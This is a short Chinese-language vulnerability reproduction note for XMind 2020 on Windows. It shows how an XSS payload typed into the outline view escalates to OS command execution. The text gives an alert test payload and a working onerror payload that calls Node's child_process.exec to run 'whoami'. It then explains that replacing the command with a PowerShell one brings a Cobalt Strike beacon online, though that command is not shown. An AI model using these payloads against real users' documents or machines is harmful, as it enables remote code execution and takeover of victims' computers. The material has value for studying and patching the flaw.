攻击机:Win 10
0x01 影响版本
官网windows最新版本:XMind-2020-for-Windows-64bit-10.3.1-202101070032
0x02 漏洞复现
(1)安装Xmind后,新建一个思维导图,然后点击大纲:
(2)尝试XSS语句测试payload:(windows版本,选中后点击ctrl即可触发弹框)
<img src=x onerror=alert(1)>
(3)尝试使用xss进行命令执行:
<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">
(4)上线CS,直接将whoami替换为powershell命令即可成功上线CS:
生成powershell上线命令即可上线CS:
成功上线: